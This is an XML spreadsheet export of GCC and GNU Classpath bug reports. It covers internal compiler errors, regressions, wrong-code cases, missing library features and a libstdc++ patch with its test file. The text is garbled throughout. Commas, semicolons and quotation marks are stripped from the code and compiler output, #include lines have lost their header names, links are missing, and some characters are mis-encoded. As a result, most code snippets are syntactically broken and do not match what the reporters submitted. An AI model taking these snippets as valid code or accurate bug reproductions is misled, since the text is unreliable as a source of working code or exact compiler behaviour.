  MyMinV1(double double):
    minsd   xmm0 xmm1
    ret
  MyMinV2(double double):
    movsd   QWORD PTR [rsp-24] xmm0
    movsd   QWORD PTR [rsp-16] xmm1
    movsd   xmm0 QWORD PTR [rsp-24]
    movsd   xmm1 QWORD PTR [rsp-16]
    minsd   xmm0 xmm1
    ret
The problem is obvious the _mm_set_sd() intrinsic really generates movsd even if the content is already in the XMM register in the right place. I checked also CLang and it generates an optimal code for both functions.
You can reproduce the test-case here:
  https://gcc.godbolt.org/#compilers:!((compiler:g6options:'-O2+-Wall+'source:'%23include+%3Cxmmintrin.h%3E%0A%0Adouble+MyMinV1(double+a+double+b)+%7B%0A++return+a+%3C+b+%3F+a+:+b%3B%0A%7D%0A%0Adouble+MyMinV2(double+a+double+b)+%7B%0A++__m128d+x+%3D+_mm_set_sd(a)%3B%0A++__m128d+y+%3D+_mm_set_sd(b)%3B%0A++return+_mm_cvtsd_f64(_mm_min_sd(x+y))%3B%0A%7D%0A'))filterAsm:(commentOnly:!tdirectives:!tintel:!tlabels:!t)version:3
It looks like all GCC versions are affected.</t>
  </si>
  <si>
    <t>kobalicek.petr</t>
  </si>
  <si>
    <t>GCC-48360</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE on array assignment statement with allocatable LHS</t>
  </si>
  <si>
    <t>Created attachment 23816
Fortran 95 source which gives ICE on compilation attempt.
The attached code gives an ICE when compiled with gfortran 4.6.0 
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gcc-4.6/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.6-source/gcc-4.6-20110312/configure --enable-languages=cc++fortran --enable-checking=release --disable-bootstrap --disable-libmudflap --enable-libgomp --enable-lto --enable-gold --with-plugin-ld=/usr/bin/gold --prefix=/usr/local/gcc-4.6
Thread model: posix
gcc version 4.6.0 20110312 (experimental) (GCC) 
$ gfortran -c gf46-ice.f90
gf46-ice.f90: In function â€˜assignitâ€™:
gf46-ice.f90:19:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Fine with 4.4.3 and 4.5
Disabling the possibility of allocate-on-assignment by changing
   hmat = mmv%h0
to
   hmat(::) = mmv%h0
compiles correctly.</t>
  </si>
  <si>
    <t>krefson</t>
  </si>
  <si>
    <t>GCC-28489</t>
  </si>
  <si>
    <t>[4.2 regression] ICE in move_insn at haifa-sched.c:1968</t>
  </si>
  <si>
    <t>I get the following ICE on ia64 with gcc 4.2.  Only happens at -O2 and doesn't happen with gcc 4.0 or 4.1.
tbm@coconut0:~/delta/bin$ /usr/lib/gcc-snapshot/bin/gcc -c -O2 mini.c
mini.c: In function 'PL_next_solution':
mini.c:101: warning: cast to pointer from integer of different size
mini.c:119: warning: cast to pointer from integer of different size
mini.c:187: warning: assignment makes pointer from integer without a cast
mini.c:216: internal compiler error: in move_insn at haifa-sched.c:1968
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
tbm@coconut0:~/delta/bin$ /usr/lib/gcc-snapshot/bin/gcc -c -O1 mini.c
mini.c: In function 'PL_next_solution':
mini.c:101: warning: cast to pointer from integer of different size
mini.c:119: warning: cast to pointer from integer of different size
mini.c:187: warning: assignment makes pointer from integer without a cast
tbm@coconut0:~/delta/bin$ gcc-4.1 -c -O2 mini.c
mini.c: In function 'PL_next_solution':
mini.c:101: warning: cast to pointer from integer of different size
mini.c:119: warning: cast to pointer from integer of different size
mini.c:187: warning: assignment makes pointer from integer without a cast
tbm@coconut0:~/delta/bin$ gcc-4.0 -c -O2 mini.c
mini.c: In function 'PL_next_solution':
mini.c:101: warning: cast to pointer from integer of different size
mini.c:119: warning: cast to pointer from integer of different size
mini.c:187: warning: assignment makes pointer from integer without a cast
tbm@coconut0:~/delta/bin$</t>
  </si>
  <si>
    <t>maxim</t>
  </si>
  <si>
    <t>GCC-52042</t>
  </si>
  <si>
    <t>libitm.c/clone-1.c (all darwin) and libitm.c/stackundo.c (darwin 11) execution tests fail with -fpie</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin11 the libitm testsuite failures...
FAIL: libitm.c/clone-1.c execution test
FAIL: libitm.c/stackundo.c execution test
are seen at both -m32/-m64. These test cases don't fail within
Apple gdb due to its default disabling of aslr. If aslr is enabled within gdb
the following backtraces are seen...
gdb ./stackundo.exe
GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Thu Nov  3 21:59:02 UTC 2011)
Copyright 2004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x86_64-apple-darwin...Reading symbols for shared libraries .... done
(gdb) set disable-aslr off
(gdb) r
Starting program: /sw/src/fink.build/gcc47-4.7.0-1/darwin_objdir/x86_64-apple-darwin11.2.0/libitm/testsuite/stackundo.exe 
Reading symbols for shared libraries + done
Reading symbols for shared libraries ++++........................ done
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000001000010b0
clone_entry_compare (a=0x1000010a0 b=0x1000010b0) at ../../../gcc-4.7-20120126/libitm/clone.cc:105
105	  if (aa-&gt;orig orig)
(gdb) bt
#0  clone_entry_compare (a=0x1000010a0 b=0x1000010b0) at ../../../gcc-4.7-20120126/libitm/clone.cc:105
#1  0x00007fff8ddd4894 in _qsort ()
#2  0x00000001016948c6 in _ITM_registerTMCloneTable (xent=0x1000010a0 size=2) at ../../../gcc-4.7-20120126/libitm/clone.cc:155
Current language:  auto currently c++
gdb ./clone-1.exeGNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Thu Nov  3 21:59:02 UTC 2011)Copyright 2004 Free Software Foundation Inc.GDB is free software covered by the GNU General Public License and you arewelcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as x86_64-apple-darwin...Reading symbols for shared libraries .... done
(gdb) set disable-aslr off
(gdb) r
Starting program: /sw/src/fink.build/gcc47-4.7.0-1/darwin_objdir/x86_64-apple-darwin11.2.0/libitm/testsuite/clone-1.exe 
Reading symbols for shared libraries + done
Reading symbols for shared libraries ++++........................ done
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000001000010a8
clone_entry_compare (a=0x100001098 b=0x1000010a8) at ../../../gcc-4.7-20120126/libitm/clone.cc:105
105	  if (aa-&gt;orig orig)
(gdb) bt
#0  clone_entry_compare (a=0x100001098 b=0x1000010a8) at ../../../gcc-4.7-20120126/libitm/clone.cc:105
#1  0x00007fff8ddd4894 in _qsort ()
#2  0x000000010299a8c6 in _ITM_registerTMCloneTable (xent=0x100001098 size=2) at ../../../gcc-4.7-20120126/libitm/clone.cc:155
Current language:  auto currently c++
Using built-in specs.
COLLECT_GCC=gcc-fsf-4.7
COLLECT_LTO_WRAPPER=/sw/lib/gcc4.7/libexec/gcc/x86_64-apple-darwin11.2.0/4.7.0/lto-wrapper
Target: x86_64-apple-darwin11.2.0
Configured with: ../gcc-4.7-20120126/configure --prefix=/sw --prefix=/sw/lib/gcc4.7 --mandir=/sw/share/man --infodir=/sw/lib/gcc4.7/info --with-build-config=bootstrap-lto --enable-stage1-languages=clto --enable-languages=cc++fortranltoobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-ppl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.7 --enable-checking=yes --enable-cloog-backend=isl
Thread model: posix
gcc version 4.7.0 20120126 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-6340</t>
  </si>
  <si>
    <t>copy constructor vs non-default constructor</t>
  </si>
  <si>
    <t>the attached code generates the following error:
foo.cpp: In function `int main (int char **)':
foo.cpp:16: `Thing2::Thing2 (const Thing2 &amp;)' is private
foo.cpp:25: within this context
while the copy constructor is private it should never 
be called.  in fact if it is made public it *is*
never called.  it seems as if g++ just wants there to be 
a public copy constructor to give it a warm fuzzy feeling.
the workaround is to use:
Thing2 b( a )
Release:
3.02
Environment:
red hat linux 7.1
kernel 2.4.2-2
How-To-Repeat:
g++ -lstdc++ foo.cpp</t>
  </si>
  <si>
    <t>swhite</t>
  </si>
  <si>
    <t>GCC-50700</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] __builtin_object_size computed wrong</t>
  </si>
  <si>
    <t>extern void abort (void)
struct S {
    int len
    char s[0]
}
int main()
{
  char buf[sizeof (struct S) + 32]
  if (__builtin_object_size (((struct S *)&amp;buf[0])-&gt;s 1) != 32)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-2535</t>
  </si>
  <si>
    <t>array of inner interface classes not found in declaration</t>
  </si>
  <si>
    <t>(Hopefully this is not already in the bugdb...)
$ cat &gt;Test2.java &lt;&lt;__END__
class Test {
  Outer.Inner[] foo
}
interface Outer {
  public class Inner {}
}
__END__
$ gcj -C Test2.java 
Test2.java:2: Type `Outer.Inner' not found in declaration of field `foo'.
        Outer.Inner[] foo
           ^
1 error
Oskar Liljeblad (osk@hem.passagen.se)
Release:
3.0 20010409</t>
  </si>
  <si>
    <t>GCC-2114</t>
  </si>
  <si>
    <t>[v3] libstdc++/1972 libstdc++/2089 fixes</t>
  </si>
  <si>
    <t xml:space="preserve"> fixes two bugs libstdc++/1972 and libstdc++/2089
 tested: x86/linux
 in both branch and head
 2001-02-26  Benjamin Kosnik  
 	libstdc++/1972
 	libstdc++/2089
 	* include/bits/std_stdexcept.h (logic_error::logic_error): Use
 	string object not reference.
 	(runtime_error::runtime_error): Same.
 	* testsuite/19_diagnostics/stdexceptions.cc: New file.
 Index: include/bits/std_stdexcept.h
 ===================================================================
 RCS file: /cvs/gcc/gcc/libstdc++-v3/include/bits/std_stdexcept.hv
 retrieving revision 1.4
 diff -c -p -r1.4 std_stdexcept.h
 *** std_stdexcept.h	2001/02/19 18:52:25	1.4
 --- std_stdexcept.h	2001/02/27 04:09:21
 ***************
 *** 3749 ****
   #pragma GCC system_header
   #include 
 ! #include 
   namespace std 
   {
     class logic_error : public exception 
     {
 !     const string
     public:
       explicit 
 --- 3749 ----
   #pragma GCC system_header
   #include 
 ! #include 
   namespace std 
   {
     class logic_error : public exception 
     {
 !     const string _M_msg
     public:
       explicit 
 *************** namespace std 
 *** 8288 ****
     class runtime_error : public exception 
     {
 !     const string
     public:
       explicit 
 --- 8288 ----
     class runtime_error : public exception 
     {
 !     const string _M_msg
     public:
       explicit 
 Index: testsuite/19_diagnostics/stdexceptions.cc
 ===================================================================
 RCS file: stdexceptions.cc
 diff -N stdexceptions.cc
 *** /dev/null	Tue May  5 13:32:27 1998
 --- stdexceptions.cc	Mon Feb 26 20:09:48 2001
 ***************
 *** 0 ****
 --- 180 ----
 + // 2001-02-26 Benjamin Kosnik  
 + 
 + // Copyright (C) 2001 Free Software Foundation Inc.
 + //
 + // This file is part of the GNU ISO C++ Library.  This library is free
 + // software you can redistribute it and/or modify it under the
 + // terms of the GNU General Public License as published by the
 + // Free Software Foundation either version 2 or (at your option)
 + // any later version.
 + 
 + // This library is distributed in the hope that it will be useful
 + // but WITHOUT ANY WARRANTY without even the implied warranty of
 + // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 + // GNU General Public License for more details.
 + 
 + // You should have received a copy of the GNU General Public License along
 + // with this library see the file COPYING.  If not write to the Free
 + // Software Foundation 59 Temple Place - Suite 330 Boston MA 02111-1307
 + // USA.
 + 
 + // 19.1 Exception classes
 + 
 + #include 
 + #include 
 + #include 
 + 
 + // libstdc++/1972
 + void test01()
 + {
 +   bool test = true
 +   const char* strlit = lack of sunlight no water error
 +   // XXX work around long-standing pathalogical hostility-inducing parser bug
 +   // std::logic_error obj(std::string(strlit))
 + 
 +   // 1
 +   std::logic_error obj = std::logic_error(std::string(strlit))
 + 
 +   // 2
 +   // std::logic_error obj((std::string)strlit)
 + 
 +   VERIFY( strcmp(obj.what() strlit) )
 + }
 + 
 + void test02()
 + {
 +   bool test = true
 +   std::string s = lack of sunlight error
 +   std::domain_error x(s)
 +   
 +   VERIFY( strcmp(x.what() s.data())  )
 + }
 + 
 + // libstdc++/2089
 + class fuzzy_logic : public std::logic_error
 + {
 + public:
 +   fuzzy_logic() : std::logic_error(whoa) { }
 + }
 + 
 + void test03()
 + {
 +   bool test = true
 + 
 +   try
 +     { throw fuzzy_logic() }
 +   catch(const fuzzy_logic&amp; obj)
 +     { VERIFY( strcmp(whoa obj.what()) ) }
 +   catch(...)
 +     { VERIFY( false ) }
 + }
 + 
 + 
 + int main(void)
 + {
 +   test01()
 +   test02()
 +   test03()
 +   
 +   return 0
 + }
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-49551</t>
  </si>
  <si>
    <t>tentative declaration after definition and -fdata-sections cause ICE in C front-end.</t>
  </si>
  <si>
    <t>The following 2 line cause both gcc-4.6.0 and trunk to crash:
---bug.c---
int x = 1
int x
---
$ arm-unknown-linux-gnueabi-gcc -O -fdata-sections bug.c
bug.c:2:1: internal compiler error: in get_variable_section at varasm.c:1004
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ arm-unknown-linux-gnueabi-gcc -v
Using built-in specs.
COLLECT_GCC=install/bin/arm-unknown-linux-gnueabi-gcc
COLLECT_LTO_WRAPPER=/usr/local/google2/home/dougkwan/gcc-trunk-1/install/bin/../libexec/gcc/arm-unknown-linux-gnueabi/4.7.0/lto-wrapper
Target: arm-unknown-linux-gnueabi
Configured with: ../gcc/configure --target=arm-unknown-linux-gnueabi --disable-bootstrap --enable-languages=c --with-gmp=/home/dougkwan/gcc-lib --with-sysroot=/home/dougkwan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root
Thread model: posix
gcc version 4.7.0 20110607 (experimental) (GCC)</t>
  </si>
  <si>
    <t>prathamesh3492</t>
  </si>
  <si>
    <t>GCC-51517</t>
  </si>
  <si>
    <t>[4.5 Regression] Wrong debug information for pointers with negative strides.</t>
  </si>
  <si>
    <t>Created attachment 26062
Example to demostrate
Consider attached examples pointer ip: 
integer dimension (:) pointer :: ip
If you associate it twice for two variables 
.....
ip   =&gt; it  (10:1:-2)
.... 
ip    =&gt; unpleasant%small_pad
than stride calculated as zero
 : Abbrev Number: 7 (DW_TAG_variable)
     DW_AT_name        : ip	
     DW_AT_decl_file   : 1	
     DW_AT_decl_line   : 8	
     DW_AT_type        : 	
     DW_AT_location    : 3 byte block: 91 b0 7e 	(DW_OP_fbreg: -208)
 : Abbrev Number: 15 (DW_TAG_array_type)
     DW_AT_data_location: 2 byte block: 97 6 	(DW_OP_push_object_address DW_OP_deref)
     DW_AT_associated  : 4 byte block: 97 6 30 2e 	(DW_OP_push_object_address DW_OP_deref DW_OP_lit0 DW_OP_ne)
     DW_AT_type        : 	
     DW_AT_sibling     : 
 : Abbrev Number: 14 (DW_TAG_subrange_type)
     DW_AT_lower_bound : 4 byte block: 97 23 20 6 	(DW_OP_push_object_address DW_OP_plus_uconst: 32 DW_OP_deref)
     DW_AT_upper_bound : 4 byte block: 97 23 28 6 	(DW_OP_push_object_address DW_OP_plus_uconst: 40 DW_OP_deref)
     DW_AT_stride      : 6 byte block: 97 23 18 6 30 1e 	(DW_OP_push_object_address DW_OP_plus_uconst: 24 DW_OP_deref DW_OP_lit0 DW_OP_mul)
I think error is in: DW_OP_lit0. Should be something like DW_OP_lit2
This is regression from 4.4 and is broken in 4.5 and 4.6
I have attached an example that you can compile and verify.</t>
  </si>
  <si>
    <t>nikolay</t>
  </si>
  <si>
    <t>GCC-67818</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: libgomp.fortran/alloc-comp-[23].f90</t>
  </si>
  <si>
    <t>On Linux/ia32 r228361 gave:
FAIL: libgomp.fortran/alloc-comp-2.f90   -O0  execution test
FAIL: libgomp.fortran/alloc-comp-2.f90   -O2  execution test
FAIL: libgomp.fortran/alloc-comp-3.f90   -O0  execution test
FAIL: libgomp.fortran/alloc-comp-3.f90   -O2  execution test
r228313 is OK.</t>
  </si>
  <si>
    <t>CLASSPATH-22900</t>
  </si>
  <si>
    <t>Encodings missing from java.io</t>
  </si>
  <si>
    <t xml:space="preserve">The following required encodings are missing from the java.io encoders/decoders:
UnicodeBig (present in NIO as UTF_16Encoder/Decoder)
UnicodeLittle (as above)
Cp1252 (missing in both java.io and java.nio)
</t>
  </si>
  <si>
    <t>GCC-83996</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE with zero-sized array</t>
  </si>
  <si>
    <t>The testcase gcc/testsuite/gcc.dg/pr81695.c triggers an ICE since GCC 4.7.0
when compiled with the C++-frontend:
pr81695.c: In function 'int main()':
pr81695.c:10:37: internal compiler error: in size_binop_loc at fold-const.c:1884
   __builtin_printf (%d\n *(z + 1))
                                     ^
0x6bf9f2 size_binop_loc(unsigned int tree_code tree_node* tree_node*)
        ../../gcc/gcc/fold-const.c:1883
0x8495e6 cxx_fold_indirect_ref
        ../../gcc/gcc/cp/constexpr.c:3148
0x84fea4 cxx_eval_indirect_ref
        ../../gcc/gcc/cp/constexpr.c:3218
0x84fea4 cxx_eval_constant_expression
        ../../gcc/gcc/cp/constexpr.c:4269
0x854317 cxx_eval_outermost_constant_expr
        ../../gcc/gcc/cp/constexpr.c:4766
0x856f66 maybe_constant_value(tree_node* tree_node*)
        ../../gcc/gcc/cp/constexpr.c:4980
0x81461b build_cxx_call(tree_node* int tree_node** int)
        ../../gcc/gcc/cp/call.c:8666
0x818e39 build_over_call
        ../../gcc/gcc/cp/call.c:8234
0x826a3f build_new_function_call(tree_node* vec** int)
        ../../gcc/gcc/cp/call.c:4317
0x9a0c45 finish_call_expr(tree_node* vec** bool bool int)
        ../../gcc/gcc/cp/semantics.c:2489
0x92d07a cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:7239
0x92d890 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:8281
0x90e44f cp_parser_cast_expression
        ../../gcc/gcc/cp/parser.c:9049
0x90ec5a cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:9150
0x910424 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:9437
0x910b38 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:9606
0x9127e8 cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:11075
0x91854d cp_parser_statement
        ../../gcc/gcc/cp/parser.c:10879
0x919a60 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:11218
0x919b37 cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:11172
Please submit a full bug report [etc.]
Marek you reported and fixed PR81695 would you mind taking a look?</t>
  </si>
  <si>
    <t>GCC-60132</t>
  </si>
  <si>
    <t>C++11: lack of is_trivially_copy_constructible</t>
  </si>
  <si>
    <t>The C++11 standard defines the content of 
to contain among other things 
    template  struct is_trivially_copy_constructible
GCC 4.8.2 does not provide this class.
There was a related renaming mess in
the late phase of the new standard definition
process (has_trivlal_destructor etc.) so
IMHO this file needs a careful inspection to
check its conformance to the final version.
The bug has been found on Linux/x64 if this
fact is of any imnportance.</t>
  </si>
  <si>
    <t>GCC-13239</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Assertion does not seem to work correctly anymore</t>
  </si>
  <si>
    <t>The following code fails the assertion but I don't understand why. I does work
with 2.95.3. I think it fails in the builtin_expect function.
cat &gt; test.cpp &lt;&lt;EOF
#include 
struct Y {
  Y () : _y(0) {}
  int _y
  int y () const  { return _y }
}
struct X {
  X () {}
  Y _y
  inline int x() const { return 0 }
  inline Y y() const { return _y }
}
int main()
{
  X x
  assert (x.y().y()==0)
  assert ( ((x.x()==0) 
  return 0
}
EOF
g++ -DDEBUG -o test test.cpp &amp;&amp; ./test
If I replace Y::y() with return 0 then it works.
Maybe I'm doing something wrong?? I just installed the new SuSe 9.0 and it also
fails with their compiler.
Here's also the preprocessed source in case my system is not setup right.
# 1 test.cpp
# 1 
# 1 
# 1 test.cpp
# 1 /usr/include/assert.h 1 3 4
# 36 /usr/include/assert.h 3 4
# 1 /usr/include/features.h 1 3 4
# 295 /usr/include/features.h 3 4
# 1 /usr/include/sys/cdefs.h 1 3 4
# 296 /usr/include/features.h 2 3 4
# 318 /usr/include/features.h 3 4
# 1 /usr/include/gnu/stubs.h 1 3 4
# 319 /usr/include/features.h 2 3 4
# 37 /usr/include/assert.h 2 3 4
# 65 /usr/include/assert.h 3 4
extern C {
extern void __assert_fail (__const char *__assertion __const char *__file
                           unsigned int __line __const char *__function)
     throw () __attribute__ ((__noreturn__))
extern void __assert_perror_fail (int __errnum __const char *__file
                                  unsigned int __line
                                  __const char *__function)
     throw () __attribute__ ((__noreturn__))
extern void __assert (const char *__assertion const char *__file int __line)
     throw () __attribute__ ((__noreturn__))
}
# 2 test.cpp 2
struct Y {
  Y () : _y(0) {}
  int _y
  int y () const { return _y }
}
struct X {
  X () {}
  Y _y
  inline int x() const { return 0 }
  inline Y y() const { return _y }
}
int main()
{
  X x
  (static_cast (__builtin_expect (!!(x.y().y()==0) 1) ? 0 :
(__assert_fail (x.y().y()==0 test.cpp 24 __PRETTY_FUNCTION__) 0)))
  (static_cast (__builtin_expect (!!(((x.x()==0) &amp;&amp; (x.y().y()==0))) 1) ?
0 : (__assert_fail (((x.x()==0) &amp;&amp; (x.y().y()==0)) test.cpp 26
__PRETTY_FUNCTION__) 0)))
  return 0
}</t>
  </si>
  <si>
    <t>merkert</t>
  </si>
  <si>
    <t>CLASSPATH-16766</t>
  </si>
  <si>
    <t>fonts are the wrong size in kaffe's WidgetsDemo</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4.2)
Gecko/20040301
Description of problem:
The fonts are the wrong size so parts of some strings are obscured. 
I have a patch that should fix this.  I'll check it in soon.
Version-Release number of selected component (if applicable):
How reproducible:
Always
Steps to Reproduce:
1.run WidgetsDemo
Additional info:</t>
  </si>
  <si>
    <t>GCC-721</t>
  </si>
  <si>
    <t>ICE when using reserved words as identifiers</t>
  </si>
  <si>
    <t>gcc aborts with a segmentation fault instead
of an error message when compiling the example below.
This happens with export struct class. Other keywords
I tried give an error message.
Release:
2.97 20001101 (experimental)
Environment:
System: Linux sic 2.4.0-test10 #3 SMP Wed Nov 1 20:34:27 CET 2000 i686 unknown
How-To-Repeat:
struct test {
	//int class(void)
	//int struct(void)
        int export(void)
}
int test::export(void)
{
        return 0
}</t>
  </si>
  <si>
    <t>GCC-65757</t>
  </si>
  <si>
    <t>gfortran gives incorrect result for anint with real*16 argument</t>
  </si>
  <si>
    <t>gfortran gives an incorrect result for the anint (nearest whole number) function for certain real*16 arguments.  Here is a simple example:
program anintbug
implicit none
real (kind (0.q0)) q1 q2 q3
q1 = 233181505644407.99996948242187500000q0
q2 = anint (q1)
q3 = 233181505644408.00000000000000000000q0
write (6 '(f50.25)') q1 q2 q3
write (6 '(z35)') q1 q2 q3
stop
end
When compiled with gfortran anintbug.f90 this program produces the following output.  The second result should equal the third result but does not.
         233181505644407.9999694824218750000000000
         233181505644407.9999694824218750000000000
         233181505644408.0000000000000000000000000
   402EA827999FCEEFFFFC000000000000
   402EA827999FCEEFFFFC000000000000
   402EA827999FCEF00000000000000000</t>
  </si>
  <si>
    <t>GCC-53658</t>
  </si>
  <si>
    <t>internal compiler error -- segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 27616
Preprocessed source
Hello
I'm using g++ 4.7:
Using built-in specs.
COLLECT_GCC=g++-4.7
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i486-linux-gnu/4.7/lto-wrapper
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.0-8' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.7.0 (Debian 4.7.0-8) 
I encounter an ICE when running:
/tmp$ gunzip ccDalx3O.i.gz
/tmp$ LANG=C g++-4.7 -std=c++11 -Wall -c ccDalx3O.i 
In file included from ../src/structured_grid.hpp:47:0
                 from test_neumann.cpp:34:
../src/boundary.hpp:775:34: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccurVmfw.out file please attach this to your bugreport.
Kind regards
Philipp</t>
  </si>
  <si>
    <t>Philipp.B</t>
  </si>
  <si>
    <t>GCC-12470</t>
  </si>
  <si>
    <t>ICE on an ill-formed enumerator expression</t>
  </si>
  <si>
    <t>The ill-formed program below crashes gcc 3.3 on SunOS 5.7.
$ cat u.cpp &amp;&amp; g++ u.cpp
/*   1 */ int main ()
/*   2 */ {
/*   3 */     enum E { e }
/*   4 */ 
/*   5 */     return E::e ()
/*   6 */ }
/*   7 */ 
u.cpp: In function `int main()':
u.cpp:5: internal compiler error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-8608</t>
  </si>
  <si>
    <t>segmentation fault on compiling bad program</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #165635.
  Please CC 165635@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/165635 ]
[validated with gcj-3.2.1 prerelease and HEAD CVS 20021103]
---
class Bug165635 {
   public static void main (String[] argLigneDeCommande) {
        int i=0
        int a
        int b=1
        for (i=a i&lt;=b i++){
	    System.out.println(i = +i)
	}
   }
}
---
$ gcj-3.2 -C Bug165635.java
Bug165635.java: In class `Bug165635':
Bug165635.java: In method `Bug165635.main(java.lang.String[])':
Bug165635.java:2: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.2.1 (Debian) (Debian unstable)
Environment:
System: Debian GNU/Linux (unstable)
Architecture: i686
host: i386-linux
Configured with: /home/packages/gcc/3.2/gcc-3.2-3.2.1ds5/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>165635</t>
  </si>
  <si>
    <t>GCC-58903</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: SIGSEGV in hash_table::find_slot_with_hash() with -O -fdevirtualize-speculatively</t>
  </si>
  <si>
    <t>Created attachment 31099
reduced testcase
Compiler output:
$ gcc -O -fdevirtualize-speculatively testcase.C
testcase.C:12:1: internal compiler error: Segmentation fault
 }
 ^
0xc23e6f crash_signal
        /mnt/svn/gcc-trunk/gcc/toplev.c:335
0xa4c221 hash_table::find_slot_with_hash(tree_node const* unsigned int insert_option)
        /mnt/svn/gcc-trunk/gcc/hash-table.h:774
0xa49d0c get_odr_type(tree_node* bool)
        /mnt/svn/gcc-trunk/gcc/ipa-devirt.c:402
0xa4b3d4 possible_polymorphic_call_targets(tree_node* long bool* void**)
        /mnt/svn/gcc-trunk/gcc/ipa-devirt.c:798
0xa4b9c3 possible_polymorphic_call_targets
        /mnt/svn/gcc-trunk/gcc/ipa-utils.h:89
0xa4b9c3 ipa_devirt
        /mnt/svn/gcc-trunk/gcc/ipa-devirt.c:999
0xa4b9c3 execute
        /mnt/svn/gcc-trunk/gcc/ipa-devirt.c:1181
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r203876 - ICE</t>
  </si>
  <si>
    <t>GCC-5600</t>
  </si>
  <si>
    <t>Re: boehm-gc filenames differ only in case</t>
  </si>
  <si>
    <t xml:space="preserve"> David.Billinghurst@riotinto.com wrote:
 &gt;&gt;Category:       other
 &gt;&gt;Synopsis:       boehm-gc filenames differ only in case
 &gt;&gt;Confidential:   no
 &gt;&gt;Severity:       serious
 &gt;&gt;Priority:       medium
 &gt;&gt;Class:          change-request
 &gt;&gt;Submitter-Id:   net
 &gt;&gt;Originator:     David Billinghurst
 &gt;&gt;Release:        gcc 3.1
 &gt;&gt;Environment:
 &gt;&gt;
 &gt;N/A
 &gt;
 &gt;&gt;Description:
 &gt;&gt;
 &gt;The recent import of boehm-gc GC 6.1alpha3 has introduced the file sparc_mach_dep.S.  This clashes with
 &gt;sparc_mach_dep.s on case-insensitive file systems 
 &gt;and will lead to grief at some stage.
 &gt;
 &gt;Could the file be renamed please.
 &gt;
 &gt;PS. There is no ChangeLog entry for the import.
 &gt;
 Err thats odd. I have not actually committed the import yet so I'm not 
 sure why the new files are showing up in the head already. The 
 sparc_mach_dep.s is an old version of the file and I'll make sure it 
 gets deleted when I commit.
 regards
 Bryce.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-42934</t>
  </si>
  <si>
    <t>Bogus variable_check</t>
  </si>
  <si>
    <t>(Follow up from 41777 comment 10)
The following variable_check in check.c does not make much sense:
  if ((e-&gt;expr_type == EXPR_VARIABLE
       &amp;&amp; e-&gt;symtree-&gt;n.sym-&gt;attr.flavor != FL_PARAMETER)
